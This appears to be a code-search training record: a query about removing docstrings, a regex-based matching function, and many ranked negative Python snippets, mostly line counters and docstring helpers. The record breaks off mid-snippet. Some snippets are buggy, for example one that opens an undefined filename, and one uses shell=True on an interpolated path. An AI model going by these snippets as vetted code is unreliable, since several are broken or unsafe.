[ "def _getNewCodeLength(self):\n nb_lines = 0\n for line in self.body.splitlines():\n if not line.startswith(\"-\"):\n nb_lines += 1\n return nb_lines", "def _getOldCodeLength(self):\n nb_lines = 0\n for line in self.body.splitlines():\n if not line.startswith(\"+\"):\n nb_lines += 1\n return nb_lines", "def lines_of_code(project: Project) -> int:\n ret = sh.cloc(\"--quiet\", \"--include-lang=Python\", \"--yaml\", str(project.root))\n ret_obj = list(yaml.safe_load_all(str(ret)))\n return ret_obj[0][\"Python\"][\"code\"]", "def no_of_lines():\n number_of_lines = len(open(FILE_NAME).readlines())\n return number_of_lines", "def line_count(fname):\n return int(call(['wc', '-l', fname]).strip().split()[0])", "def get_linecount(self):\n self._update_linetab(len(self.input))\n lcount = len(self.__linepos)\n return lcount - (self.input.endswith('\\n'))", "def number_of_lines(filename=\"\"):\n c = 0\n with open(filename) as f:\n for r in f:\n c += 1\n return(c)", "def number_of_lines(filename=\"\"):\n num_lines = 0\n with open(filename, encoding=\"utf-8\") as myFile:\n return myFile.read().count('\\n')", "def linecount(x):\n return sum(1 for char in x if char == \"\\n\")", "def number_of_lines(filename=\"\"):\n count = 0\n with open(filename) as f:\n for lines in f:\n count += 1\n return (count)", "def linecounter(x):\n return linecount(x) + longlines(x)", "def test_line_count(self):\n self.assertEqual(analyze_text(self.filename)[0], 11)", "def __len__(self):\n nlines = self.get_endline() - self.get_startline() + 1\n if nlines < 0:\n nlines = 0\n return nlines", "def test_line_count(self):\n\t\tself.assertEqual(analyse_text(self.filename)[0], 4)", "def num_lines(file_name):\n with open(file_name) as file:\n for i, line in enumerate(file):\n pass\n return i + 1", "def number_of_lines(filename=\"\"):\n with open(filename, encoding='UTF8') as a_file:\n\n lineNum = 0\n\n for eachLine in a_file:\n lineNum += 1\n return lineNum", "def test_line_count(self):\n self.assertEqual(analyze_text(self.filename)[0], 4)", "def test_line_count(self):\n self.assertEqual(analyze_text(self.filename)[0], 4)", "def number_of_lines(filename=\"\"):\n with open(filename, encoding=\"utf-8\") as file:\n text = file.readlines()\n return len(text)", "def number_of_lines(filename=\"\"):\n\n number_lines = 0\n with open(filename) as file_opened:\n for line in file_opened:\n number_lines += 1\n return number_lines", "def num_lines(fname):\n with open(fname) as f:\n for i, l in enumerate(f):\n pass\n return( i + 1 )", "def CountLineNumber(filename):\n\n fp = open(os.path.abspath(filename), \"r\");\n lines = 0\n for line in fp.readlines():\n lines = lines + 1\n fp.close()\n return lines", "def number_of_lines(filename=\"\"):\n counter = 0\n with open(filename, \"r\") as my_file:\n for line in my_file:\n counter += 1\n my_file.close()\n return (counter)", "def num_lines(self, snapshot: Bug, filepath: str) -> int:\n return len(self._line_offsets(snapshot, filepath))", "def n_lines(self):\n try: \n return self._n_lines\n except AttributeError:\n self._n_lines = len(self.lines())\n return self._n_lines", "def number_of_lines(filename=\"\"):\n n_lines = 0\n with open(filename, encoding='utf-8', mode='r') as file:\n for lines in file:\n n_lines += 1\n return n_lines", "def number_of_lines(filename=\"\"):\n line_number = 0\n with open(filename, encoding='UTF8') as f:\n for line in f:\n line_number += 1\n return line_number", "def lineNumber(self):\n if self.__lineNumber is None:\n self.__lineNumber = self.__source.count(\"\\n\", 0, self.__offset) + 1\n\n return self.__lineNumber", "def count_lines(filename):\r\n with open(filename, 'rb') as f:\r\n return sum(1 for line in f)", "def calculate_line_number(text):\n return len([line for line in text.split(\"\\n\") if line.strip() != \"\"])", "def number_of_lines(filename=\"\"):\n n = 0\n if filename == \"\":\n return n\n with open(filename, \"r\") as f:\n for line in f:\n n = n + 1\n return n", "def count_lines(file_uri):\n\n with open(file_uri) as file_obj:\n for i, line in enumerate(file_obj):\n pass\n num_lines = i + 1\n return num_lines", "def count_lines(filename):\n with open(filename, 'rb') as f:\n return sum(1 for line in f)", "def fileLineCount(fPath):\n\twith open(fPath) as f:\n\t\tfor i, li in enumerate(f):\n\t\t\tpass\n\treturn (i + 1)", "def numLinesInFile(fname):\n with open(fname, 'rb') as f:\n for i, l in enumerate(f):\n pass\n return i + 1", "def line_count(file):\n with open(file, \"r\") as f:\n return sum(1 for line in f)", "def countLines(file_name, start, end):\r\n\r\n with open(file_name, \"r\") as file:\r\n counter_lines = 0\r\n\r\n for line in islice(file, start, end):\r\n counter_lines += 1\r\n\r\n return counter_lines", "def number_of_lines(filename=\"\"):\n with open(filename, encoding='utf-8') as myFile:\n return sum([1 for line in myFile])", "def analyzeCppCode(self, sourceFile):\n numLines = 0 # Number of lines of code\n numComments = 0 # Number of comments in the code\n\n f=self.openFile(sourceFile)\n for line in f:\n numLines += 1;\n loc = 0\n while (loc != -1): #count the # of times the '/*' characters appears\n loc = line.find(\"#\", loc)\n if (loc != -1):\n loc += 1\n numComments += 1\n \n loc = 0\n loc = line.find('//', loc) #count the # of times the '//' characters appears\n if (loc != -1):\n loc += 1\n numComments += 1\n \n f.close()\n return numLines, numComments", "def count_lines(stream):\n return len(stream.readlines())", "def file_len(full_path):\n f = open(full_path)\n nr_of_lines = sum(1 for line in f)\n f.close()\n return nr_of_lines", "def countlines(fn):\n with open(fn, 'rb') as f:\n bufgen = takewhile(\n lambda x: x, (f.read(1024 * 1024) for _ in repeat(None)))\n ln = sum(buf.count(b'\\n') for buf in bufgen)\n return ln", "def line_length(self, dLine = 0):\n return self.buffer.line_length(self.line + dLine)", "def len(self):\n\t\t\n\t\treturn len(self.line)", "def GetNumberCodeBlocks(separators):\n num_blocks = len(separators) + 1\n assert num_blocks >= 2\n return num_blocks", "def get_line_no(obj):\n try:\n lineno = getsourcelines(obj)[1]\n except:\n # no code found\n lineno = None\n return lineno", "def get_code_length(code):\n ignore = [\"{\", \"}\", \"(\", \")\", \";\", \":\"]\n for ig in ignore:\n code = code.replace(ig, \"\")\n return len([e.strip() for e in code.split(\"\\n\") if (not e.strip() == \"\") and (not e.strip() == u\"'\") and (not e.strip() == u\"u'\")])", "def get_file_line_count(a_file):\r\n count = -1\r\n try:\r\n for count, line in enumerate(open(a_file, \"rU\")):\r\n pass\r\n except IOError:\r\n pass\r\n count += 1\r\n return count", "def get_file_line_count(a_file):\r\n count = -1\r\n try:\r\n for count, line in enumerate(open(a_file, \"rU\")):\r\n pass\r\n except IOError:\r\n pass\r\n count += 1\r\n return count", "def sentence_count(self):\n count = 0\n for line in self.lines:\n if '.' in line:\n count += 1\n if count == 0:\n count = 1\n return count\n #return line.count('.')\n #else:\n #return 1", "def count_lines_of_code(repo_path):\n\n cmd = \"cloc\"\n out = subprocess.Popen(\n f\"{cmd} {repo_path}\",\n shell=True,\n stdout=subprocess.PIPE,\n universal_newlines=True,\n ).stdout.read()\n\n str = StringIO(out)\n for line in str:\n if line.startswith(\"--------\"):\n break\n data = pd.read_csv(\n str,\n skiprows=0,\n skipfooter=3,\n skip_blank_lines=True,\n sep=r\"[ ]{5,}\",\n index_col=\"Language\",\n comment=\"-\",\n engine=\"python\",\n )\n\n return data", "def no_of_lines():\n return render_template(\"no_of_lines.html\", no_of_lines=no_of_lines())", "def getIndentationLevel(self, code_line):\n print(\"the code line : \", code_line)\n return len(code_line) - len(code_line.lstrip(\" \"))", "def num_lines_in_file(file_name):\n line_idx = -1\n with open(file_name) as file:\n for line_idx, _ in enumerate(file):\n pass\n return line_idx + 1", "def _get_last_code_line():\n return max(_code_lines) + 2", "def peek_length(self) -> Optional[int]:\n LINE_CUTOFF = 10_000\n count = 0\n with open(self.path, mode='r') as f:\n for _ in f:\n count += 1\n\n return count", "def _loc(self) -> int:\n return len(self.lines)", "def file_number_of_lines(file_name):\n try:\n item = (0, None)\n with open(file_name) as file_handler:\n for item in enumerate(file_handler):\n pass\n return item[0] + 1\n except IOError:\n return 0", "def bufcount(filename):\n\timport gzip\n\tif filename.split('.')[-1] in ['gz','gzip']: f = gzip.open(filename)\n\telse: f = open(filename)\n\tlines = 0\n\tbuf_size = 1024 * 1024\n\tread_f = f.read # loop optimization\n\t\n\tbuf = read_f(buf_size)\n\twhile buf:\n\t\tlines += buf.count('\\n')\n\t\tbuf = read_f(buf_size)\n\t\tf.close\n\treturn lines", "def lines_processed(self) -> int:\n with self.lock:\n return self._lines_processed", "def get_n_lines(file):\n return sum(1 for _ in open(file))", "def get_line_length(file_path):\n with open(file_path, 'rb+') as f:\n return len(f.readline())", "def test_makefile_total_lines(cookies, context, black, pipenv, mypy):\n ctx = context(black=black, pipenv=pipenv, mypy=mypy)\n result = cookies.bake(extra_context=ctx)\n\n makefile = result.project.join('Makefile')\n lines = makefile.readlines(cr=False)\n\n expected = 27\n expected -= 2 if black == 'n' else 0\n expected -= 1 if mypy == 'do not use' else 0\n assert len(lines) == expected", "def lineno():\n return str(' - Statement - line number: '+str(inspect.currentframe().f_back.f_lineno))", "def file_len(fname):\n with open(fname) as f:\n for i, l in enumerate(f):\n pass\n Nrows = i + 1\n return Nrows", "def count_len(self):\n total = 0\n for filename in self.filenames:\n f = open(os.path.join(self.directory, filename))\n line_count = 0\n for _ in f:\n line_count += 1\n if line_count < self.window_size:\n continue\n else:\n total += line_count - self.window_size + 1\n return total", "def line(self) -> int:", "def linenum(self):\n return self.source_frame_stack.linenum()", "def error_count():\n return cpp_style.error_count()", "def count() -> int:\n pass", "def get_number_lines(running_reward_file, running_loss_file, action_count_file):\n if Path(running_reward_file).exists():\n data = np.loadtxt(running_reward_file).reshape(-1,2)\n return data.shape[0]\n if Path(running_loss_file).exists():\n data = np.loadtxt(running_loss_file).reshape(-1,2)\n return data.shape[0]\n if Path(action_count_file).exists():\n data = np.loadtxt(action_count_file).reshape(-1,2)\n return data.shape[0]\n raise NameError(\"No files to count lines\")", "def count_lines(filename):\n with open(filename, 'r', encoding='utf-8') as file:\n lines_count = int()\n for line in file:\n lines_count += 1\n info_tuple = (filename, lines_count)\n return info_tuple", "def lineno():\n\treturn inspect.currentframe().f_back.f_lineno", "def lineno():\r\n\treturn inspect.currentframe().f_back.f_lineno", "def lineno():\n\n return inspect.currentframe().f_back.f_lineno", "def count_lines(file_obj):\n for idx, line in enumerate(file_obj):\n pass\n file_obj.seek(0)\n return idx + 1", "def _count_comment_rows(vcf_path):\n vcf_lines_generator = lines_from_vcf(vcf_path)\n\n comment_lines_count = 0\n for line in vcf_lines_generator:\n if line.startswith('#'):\n comment_lines_count += 1\n else:\n vcf_lines_generator.close() # Don't leave the file handle opened\n # Don't continue reading the VCF once the comments section ended\n break\n\n return comment_lines_count", "def lineno():\n return inspect.currentframe().f_back.f_lineno", "def lineno():\n return inspect.currentframe().f_back.f_lineno", "def lineno():\n return inspect.currentframe().f_back.f_lineno", "def lineno():\n return inspect.currentframe().f_back.f_lineno", "def lineno():\n return inspect.currentframe().f_back.f_lineno", "def lineno():\n return inspect.currentframe().f_back.f_lineno", "def lineno():\n return \"line \" + str(inspect.currentframe().f_back.f_lineno) + \": \"", "def get_total_line_counts(self):\n return get_total_line_counts(self.files.all())", "def _get_line_number(vcf):\n with open(vcf) as vcf_input_file:\n i = -1\n for line in vcf_input_file:\n i += 1\n return i", "def getNumRows(self) -> int:\n ...", "def num_bytes_per_line(self):\n return self._num_bytes_per_line", "def get_filesize(inputfile) -> int:\n with open(inputfile, \"rb\") as f:\n lines = 0\n buf_size = 1024 * 1024\n read_f = f.raw.read\n\n buf = read_f(buf_size)\n while buf:\n lines += buf.count(b\"\\n\")\n buf = read_f(buf_size)\n\n return lines", "def main():\n\tcount = 0\n\twith open(FILE, 'r') as f:\n\t\tfor line in f:\n\t\t\tcount += 1\n\tprint('There are ' + str(count) + ' lines in '+str(FILE))", "def count_total_line():\n count = 0\n file_count = 0\n for filename in os.listdir('.'):\n if filename.endswith(\".json\"):\n file_count += 1\n with open(filename, 'r', encoding='utf8') as f:\n for line in f:\n count += 1\n print(\"There are {0} lines in {1} json files\".format(count, file_count))", "def do_len(self, line):\n\t\tif isinstance(self.cl, Book):\n\t\t\tprint(len(self.cl.data))\n\t\telse:\n\t\t\tprint(\"To get number of contacts you need to open or create book\")", "def data_len(self):\n Nrows_data = 0\n with self._compression_safe_file_opener(self.input_fname, \"r\") as f:\n for i, l in enumerate(f):\n if (l[0 : len(self.header_char)] != self.header_char) and (l != \"\\n\"):\n Nrows_data += 1\n return Nrows_data", "def file_len(filename):\n with open(filename) as f:\n for i, l in enumerate(f):\n pass\n return i + 1", "def get_lineno(self):\n return self.lexer.get_lineno()", "def word_count(self):\n print(self.words())\n return len(self.words())\n #count = 0\n #for lines in self.lines:\n # line = lines.strip(os.linesep)\n # wordslst = line.split()\n # count += len(wordslst)\n #return count\n #joined_string = ''.join(self.lines)\n #for word in joined_string:\n # if word != ' ' and word != '\\n' and word != '\\t':\n # count += 1\n #print('READ ME ––––––––––', self.lines)\n #print(joined_string)\n #print(line)\n #print(wordslst)\n #print(count)", "def len(self, table):\n return self.get_table_nb_lines(table)", "def __len__(self):\n return len(self._statements)", "def file_length(fileName):\n with open(f_pass) as f:\n for i, l in enumerate(f):\n pass\n return i + 1", "def analyzePythonCode(self, sourceFile):\n numLines = 0 # Number of lines of code\n numDocStr = 0 # Number of doc strings in code\n numComments = 0 # Number of comments in the code\n numDefs = 0 # Number of functions\n numClasses = 0 # Number of classes\n f=self.openFile(sourceFile)\n for line in f:\n numLines += 1;\n loc = 0\n while (loc != -1): #count the # of times the '#' characters appears\n loc = line.find(\"#\", loc)\n if (loc != -1):\n loc += 1\n numComments += 1\n loc = 0\n while (loc != -1):\n loc = line.find('\"#', loc) #discount the # of times the '#' char appears as the 1st char in double quotes (skip hex constants)\n if (loc != -1):\n loc += 1\n numComments -= 1\n loc = 0\n while (loc != -1):\n loc = line.find(\"'#\", loc) #discount the # of times the '#' char appears as the 1st char in single quotes (skip hex constants)\n if (loc != -1):\n loc += 1\n numComments -= 1\n loc = 0\n while (loc != -1): #count the # of ''' found\n loc = line.find(\"'''\", loc)\n if (loc != -1):\n loc += 1\n numDocStr += 1\n loc = 0\n while (loc != -1): #count the # of \"\"\" found\n loc = line.find('\"\"\"', loc)\n if (loc != -1):\n loc += 1\n numDocStr += 1\n\n if line.strip(AutoGrader.Const.PYTHON_WHITE_SPACES) != '':\n if line.strip(AutoGrader.Const.PYTHON_WHITE_SPACES).split()[0] == 'def': #count # of defs\n numDefs += 1\n if line.strip(AutoGrader.Const.PYTHON_WHITE_SPACES).split()[0] == 'class': #count # of classes\n numClasses += 1\n \n f.close()\n numDocStr /= 2 #assume that the \"\"\" and ''' chars appear in pairs \n return numLines, numDocStr, numComments, numDefs, numClasses" ]
[ "0.7965521", "0.7897408", "0.75982934", "0.7581331", "0.74807435", "0.7371733", "0.7250094", "0.7241558", "0.72400385", "0.72222334", "0.7206555", "0.7148526", "0.71233124", "0.709178", "0.7083922", "0.70714384", "0.70620733", "0.70620733", "0.7023198", "0.7015476", "0.70146966", "0.7013005", "0.69860053", "0.69675", "0.69659233", "0.69621384", "0.6935532", "0.6933272", "0.68894506", "0.686778", "0.6863906", "0.68272054", "0.6805853", "0.6794228", "0.6793833", "0.67871153", "0.6747637", "0.6744471", "0.66843086", "0.66719246", "0.66585904", "0.66365945", "0.66013324", "0.65991664", "0.65793055", "0.65612924", "0.65388846", "0.6534188", "0.6534188", "0.6533681", "0.6488951", "0.6456435", "0.6432857", "0.64278686", "0.64251244", "0.6413215", "0.64098006", "0.6391175", "0.635318", "0.6349418", "0.6334869", "0.62895167", "0.6233148", "0.6216152", "0.6213807", "0.6213631", "0.6211288", "0.61742073", "0.6164545", "0.6163333", "0.61625844", "0.6160504", "0.6151104", "0.61435676", "0.6131023", "0.61304003", "0.61228085", "0.61099863", "0.61099863", "0.61099863", "0.61099863", "0.61099863", "0.61099863", "0.6105835", "0.60660774", "0.60472804", "0.60425735", "0.60361856", "0.60305876", "0.6016017", "0.60140264", "0.60129535", "0.5988537", "0.5979695", "0.5968303", "0.5924602", "0.5920255", "0.5915909", "0.59001666", "0.58822376" ]
0.68328536
31
Removes docstrings from code
def strip_docstring(blob): docstring = True while docstring == True: match_docstring = re.search('\n\s*"""[^"""]*"""', blob) if not match_docstring: docstring = False else: blob = blob.replace(blob[match_docstring.span()[0]:match_docstring.span()[1]], '') return blob
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def docstring_hack():\n pass", "def main_docstring():", "def undoc(func):\n return func", "def remove_comments_and_docstrings(source):\n io_obj = StringIO(source)\n out = \"\"\n prev_toktype = tokenize.INDENT\n last_lineno = -1\n last_col = 0\n for tok in tokenize.generate_tokens(io_obj.readline):\n token_type = tok[0]\n token_string = tok[1]\n start_line, start_col = tok[2]\n end_line, end_col = tok[3]\n ltext = tok[4]\n # The following two conditionals preserve indentation.\n # This is necessary because we're not using tokenize.untokenize()\n # (because it spits out code with copious amounts of oddly-placed\n # whitespace).\n if start_line > last_lineno:\n last_col = 0\n if start_col > last_col:\n out += (\" \" * (start_col - last_col))\n # Remove comments:\n if token_type == tokenize.COMMENT:\n pass\n # This series of conditionals removes docstrings:\n elif token_type == tokenize.STRING:\n if prev_toktype != tokenize.INDENT:\n # This is likely a docstring; double-check we're not inside an operator:\n if prev_toktype != tokenize.NEWLINE:\n # Note regarding NEWLINE vs NL: The tokenize module\n # differentiates between newlines that start a new statement\n # and newlines inside of operators such as parens, brackes,\n # and curly braces. Newlines inside of operators are\n # NEWLINE and newlines that start new code are NL.\n # Catch whole-module docstrings:\n if start_col > 0:\n # Unlabelled indentation means we're inside an operator\n out += token_string\n # Note regarding the INDENT token: The tokenize module does\n # not label indentation inside of an operator (parens,\n # brackets, and curly braces) as actual indentation.\n # For example:\n # def foo():\n # \"The spaces before this docstring are tokenize.INDENT\"\n # test = [\n # \"The spaces before this string do not get a token\"\n # ]\n\n else:\n out += token_string\n prev_toktype = token_type\n last_col = end_col\n last_lineno = end_line\n out = '\\n'.join([line for line in out.splitlines() if line.strip()])\n return out", "def clean_docstring(doc: str, unused: Literal[\"pre\", \"post\"] = None) -> str:\n doc = doc.split(\"\\n\")\n if unused == \"pre\":\n try:\n index = next(i for i, l in enumerate(doc) if l.strip())\n doc = doc[index:]\n except StopIteration:\n doc = []\n elif unused == \"post\":\n try:\n index = next(i for i, l in enumerate(reversed(doc)) if l.strip())\n doc = doc[: len(doc) - index]\n except StopIteration:\n doc = []\n if doc:\n first_line = doc[0]\n index = len(first_line) - len(first_line.lstrip())\n indent = first_line[:index]\n if all(l.startswith(indent) for l in doc if l.strip()):\n doc = [(l[index:] if l.strip() else l) for l in doc]\n return \"\\n\".join(doc)", "def doc_string():\n pass # pass does nothing", "def DocString():\n return", "def empty_fn_docstr_pass():\n pass", "def documentation_only():\n pass", "def empty_fn_docstr():", "def sanitizeForHTML (docstring):\n\n # Remove @~, which we use as a hack in Doxygen 1.7-1.8\n\n docstring = docstring.replace(r'@~', '')\n\n # First do conditional section inclusion based on the current language.\n # Our possible conditional elements and their meanings are:\n #\n # java: only Java\n # python: only Python\n # perl: only Perl\n # cpp: only C++\n # csharp: only C#\n # conly: only C\n # clike: C, C++\n # notcpp:\tnot C++\n # notclike: not C or C++\n #\n # The notcpp/notclike variants are because Doxygen 1.6.x doesn't have\n # @ifnot, yet sometimes we want to say \"if not C or C++\".\n\n cases = 'java|python|perl|cpp|csharp|conly|clike|notcpp|notclike'\n p = re.compile('@if\\s+(' + cases + ')\\s+(.+?)((@else)\\s+(.+?))?@endif', re.DOTALL)\n docstring = p.sub(translateIfElse, docstring)\n\n # Replace blank lines between paragraphs with <p>. There are two main\n # cases: comments blocks whose lines always begin with an asterix (e.g.,\n # C/C++), and comment blocks where they don't (e.g., Python). The third\n # substitution below does the same thing for blank lines, except for the\n # very end of the doc string.\n\n p = re.compile('^(\\s+)\\*\\s*$', re.MULTILINE)\n docstring = p.sub(r'\\1* <p>', docstring)\n p = re.compile('^((?!\\s+\\Z)\\s+)$', re.MULTILINE)\n docstring = p.sub(r'\\1<p>', docstring)\n p = re.compile('^(?!\\Z)$', re.MULTILINE)\n docstring = p.sub(r'<p>', docstring)\n\n # Javadoc doesn't have an @htmlinclude command, so we process the file\n # inclusion directly here.\n\n p = re.compile('@htmlinclude\\s+([^\\s:;,(){}+|?\"\\'/]+)([\\s:;,(){}+|?\"\\'/])', re.MULTILINE)\n docstring = p.sub(translateInclude, docstring)\n\n # There's no Javadoc verbatim or @code/@endcode equivalent, so we have to\n # convert it to raw HTML and transform the content too. This requires\n # helpers. The following treats both @verbatim and @code the same way.\n\n p = re.compile('@verbatim.+?@endverbatim', re.DOTALL)\n docstring = p.sub(translateVerbatim, docstring)\n p = re.compile('@code.+?@endcode', re.DOTALL)\n docstring = p.sub(translateVerbatim, docstring)\n\n # Javadoc doesn't have a @section or @subsection commands, so we translate\n # those ourselves.\n\n p = re.compile('@section\\s+[^\\s]+\\s+(.*)$', re.MULTILINE)\n docstring = p.sub(r'<h2>\\1</h2>', docstring)\n p = re.compile('@subsection\\s+[^\\s]+\\s+(.*)$', re.MULTILINE)\n docstring = p.sub(r'<h3>\\1</h3>', docstring)\n p = re.compile('@subsubsection\\s+[^\\s]+\\s+(.*)$', re.MULTILINE)\n docstring = p.sub(r'<h4>\\1</h4>', docstring)\n\n # Javadoc doesn't have an @image command. We translate @image html\n # but ditch @image latex.\n\n p = re.compile('@image\\s+html+\\s+([^\\s]+).*$', re.MULTILINE)\n docstring = p.sub(r\"<center><img src='\\1'></center><br>\", docstring)\n p = re.compile('@image\\s+latex+\\s+([^\\s]+).*$', re.MULTILINE)\n docstring = p.sub(r'', docstring)\n\n # Doxygen doesn't understand HTML character codes like &ge;, so we've\n # been using doxygen's Latex facility to get special mathematical\n # characters into the documentation, but as luck would have it, Javadoc\n # doesn't understand the Latex markup. All of this is getting old.\n\n docstring = re.sub(r'\\\\f\\$\\\\geq\\\\f\\$', '&#8805;', docstring)\n docstring = re.sub(r'\\\\f\\$\\\\leq\\\\f\\$', '&#8804;', docstring)\n docstring = re.sub(r'\\\\f\\$\\\\times\\\\f\\$', '&#215;', docstring)\n\n # The following are done in pairs because I couldn't come up with a\n # better way to catch the case where @c and @em end up alone at the end\n # of a line and the thing to be formatted starts on the next one after\n # the comment '*' character on the beginning of the line.\n\n docstring = re.sub('@c *([^ ,;()/*\\n\\t]+)', r'<code>\\1</code>', docstring)\n docstring = re.sub('@c(\\n[ \\t]*\\*[ \\t]*)([^ ,;()/*\\n\\t]+)', r'\\1<code>\\2</code>', docstring)\n docstring = re.sub('@p +([^ ,.:;()/*\\n\\t]+)', r'<code>\\1</code>', docstring)\n docstring = re.sub('@p(\\n[ \\t]*\\*[ \\t]+)([^ ,.:;()/*\\n\\t]+)', r'\\1<code>\\2</code>', docstring)\n docstring = re.sub('@em *([^ ,.:;()/*\\n\\t]+)', r'<em>\\1</em>', docstring)\n docstring = re.sub('@em(\\n[ \\t]*\\*[ \\t]*)([^ ,.:;()/*\\n\\t]+)', r'\\1<em>\\2</em>', docstring)\n\n # Convert @li into <li>, but also add <ul> ... </ul>. This is a bit\n # simple-minded (I suppose like most of this code), but ought to work\n # for the cases we use in practice.\n\n p = re.compile('^(\\s+\\*\\s+)(@li\\s+.*?)(\\s+)(\\*/|\\*\\s+@(?!li\\s)|\\*\\s+<p>)', re.MULTILINE|re.DOTALL)\n docstring = p.sub(rewriteList, docstring)\n\n # Wrap @deprecated content with a class so that we can style it.\n\n p = re.compile('^(\\s+\\*\\s+)(@deprecated\\s)((\\S|\\s)+)(<p>|\\*/)', re.MULTILINE|re.DOTALL)\n docstring = p.sub(rewriteDeprecated, docstring)\n\n # Doxygen automatically cross-references class names in text to the class\n # definition page, but Javadoc does not. Rather than having to put in a\n # lot conditional @if/@endif's into the documentation to manually create\n # cross-links just for the Java case, let's automate. This needs to be\n # done better (e.g., by not hard-wiring the class names).\n\n p = re.compile(r'([^a-zA-Z0-9_.\">])(' + r')\\b([^:])', re.DOTALL)\n if language == 'csharp':\n docstring = p.sub(translateClassRefCSharp, docstring)\n elif language == 'java':\n docstring = p.sub(translateClassRefJava, docstring)\n\n # Massage method cross-references.\n\n p = re.compile('(\\s+)(\\S+?)::(\\w+\\s*\\([^)]*?\\))', re.MULTILINE)\n if language == 'csharp':\n docstring = p.sub(translateCSharpCrossRef, docstring)\n elif language == 'java':\n docstring = p.sub(translateJavaCrossRef, docstring)\n\n # Clean-up step needed because some of the procedures above are imperfect.\n # This converts \" * * @foo\" lines into \" * @foo\":\n\n p = re.compile('^(\\s+)\\*\\s+\\*\\s+@', re.MULTILINE)\n docstring = p.sub(r'\\1* @', docstring)\n\n # Take out any left-over Doxygen-style quotes, because Javadoc doesn't have\n # the %foo quoting mechanism.\n\n docstring = re.sub('(\\s)%(\\w)', r'\\1\\2', docstring)\n\n # Currently, we don't handle @ingroup.\n\n docstring = re.sub('@ingroup \\w+', '', docstring)\n\n return docstring", "def dummy(doc):\r\n return doc", "def test_missing_docstring(a, b): # noqa: D213, D407", "def rewriteDocstringForPerl (docstring):\n\n # Get rid of the /** ... */ and leading *'s.\n docstring = docstring.replace('/**', '').replace('*/', '').replace('*', ' ')\n\n # Get rid of indentation\n p = re.compile('^\\s+(\\S*\\s*)', re.MULTILINE)\n docstring = p.sub(r'\\1', docstring)\n\n # Get rid of paragraph indentation not caught by the code above.\n p = re.compile('^[ \\t]+(\\S)', re.MULTILINE)\n docstring = p.sub(r'\\1', docstring)\n\n # Get rid of blank lines.\n p = re.compile('^[ \\t]+$', re.MULTILINE)\n docstring = p.sub(r'', docstring)\n\n # Get rid of the %foo quoting.\n docstring = re.sub('(\\s)%(\\w)', r'\\1\\2', docstring)\n\n # The following are done in pairs because I couldn't come up with a\n # better way to catch the case where @c and @em end up alone at the end\n # of a line and the thing to be formatted starts on the next one after\n # the comment '*' character on the beginning of the line.\n\n docstring = re.sub('@c *([^ ,.:;()/*\\n\\t]+)', r'C<\\1>', docstring)\n docstring = re.sub('@c(\\n[ \\t]*\\*[ \\t]*)([^ ,.:;()/*\\n\\t]+)', r'\\1C<\\2>', docstring)\n docstring = re.sub('@p +([^ ,.:;()/*\\n\\t]+)', r'C<\\1>', docstring)\n docstring = re.sub('@p(\\n[ \\t]*\\*[ \\t]+)([^ ,.:;()/*\\n\\t]+)', r'\\1C<\\2>', docstring)\n docstring = re.sub('@em *([^ ,.:;()/*\\n\\t]+)', r'I<\\1>', docstring)\n docstring = re.sub('@em(\\n[ \\t]*\\*[ \\t]*)([^ ,.:;()/*\\n\\t]+)', r'\\1I<\\2>', docstring)\n\n docstring = docstring.replace('<ul>', '\\n=over\\n')\n docstring = docstring.replace('<li> ', '\\n=item\\n\\n')\n docstring = docstring.replace('</ul>', '\\n=back\\n')\n\n docstring = docstring.replace('@return', 'Returns')\n docstring = docstring.replace(' < ', ' E<lt> ').replace(' > ', ' E<gt> ')\n docstring = re.sub('<code>([^<]*)</code>', r'C<\\1>', docstring)\n docstring = re.sub('<b>([^<]*)</b>', r'B<\\1>', docstring) \n\n return docstring", "def docstrings(param1, param2):\n return \"example string\"", "def load_pydoc(finder, module):\n module.IgnoreName(\"Tkinter\")", "def _add_doc(func, doc):\r\n func.__doc__ = doc", "def _add_doc(func, doc):\r\n func.__doc__ = doc", "def _add_doc(func, doc):\r\n func.__doc__ = doc", "def clean_doc(doc):\r\n # Replace regular enter (i.e. mere comment formatting in cpp file)\r\n # with space\r\n doc = doc.replace(\"\\n\", \" \")\r\n\r\n # The removal can cause a \"hard enter\" (literal \\n) to get an unintended\r\n # trailing space - trim those.\r\n doc = doc.replace(\"\\\\n \", \"\\\\n\")\r\n return '\"%s\"' % doc", "def rewriteDocstringForCSharp (docstring):\n\n # Preliminary: rewrite some of the data type references to equivalent\n # C# types. (Note: this rewriting affects only the documentation\n # comments inside classes & methods, not the actual method signatures.)\n\n docstring = docstring.replace(r'const char *', 'string ')\n docstring = docstring.replace(r'const char* ', 'string ')\n docstring = docstring.replace(r'an unsigned int', 'a long integer')\n docstring = docstring.replace(r'unsigned int', 'long')\n docstring = docstring.replace(r'const std::string&', 'string')\n docstring = docstring.replace(r'const std::string &', 'string ')\n docstring = docstring.replace(r'const std::string', 'string')\n docstring = docstring.replace(r'std::string', 'string')\n docstring = docstring.replace(r'const ', '')\n docstring = docstring.replace(r'NULL', 'null')\n docstring = docstring.replace(r'boolean', 'bool')\n\n # Use C# syntax instead of \"const XMLNode*\" etc.\n\n p = re.compile(r'const (%?)(' + r')( ?)(\\*|&)', re.DOTALL)\n docstring = p.sub(rewriteClassRefAddingSpace, docstring) \n p = re.compile(r'(%?)(' + r')( ?)(\\*|&)', re.DOTALL)\n docstring = p.sub(rewriteClassRefAddingSpace, docstring) \n\n # <code> has its own special meaning in C#; we have to turn our input\n # file's uses of <code> into <c>. Conversely, we have to turn our\n # uses of verbatim to <code>.\n\n p = re.compile(r'<code>(.+?)</code>', re.DOTALL)\n docstring = p.sub(r'<c>\\1</c>', docstring)\n p = re.compile('@verbatim(.+?)@endverbatim', re.DOTALL)\n docstring = p.sub(r'<code>\\1</code>', docstring)\n\n # Do replacements on some documentation text we sometimes use.\n\n p = re.compile(r'antimonyConstants([@.])')\n docstring = p.sub(r'antimonycs.antimony\\1', docstring)\n\n # Fix @link for constants that we forgot conditionalize in the source.\n\n p = re.compile(r'@link +([A-Z_0-9]+?)@endlink', re.DOTALL)\n docstring = p.sub(r'@link antimony.\\1@endlink', docstring)\n\n # Can't use math symbols. Kluge around it.\n\n docstring = re.sub(r'\\\\f\\$\\\\geq\\\\f\\$', '>=', docstring)\n docstring = re.sub(r'\\\\f\\$\\\\leq\\\\f\\$', '<=', docstring)\n docstring = re.sub(r'\\\\f\\$\\\\times\\\\f\\$', '*', docstring)\n\n # Some additional special cases.\n\n docstring = docstring.replace(r'SBML_formulaToString()', 'antimonycs.antimony.formulaToString()')\n docstring = 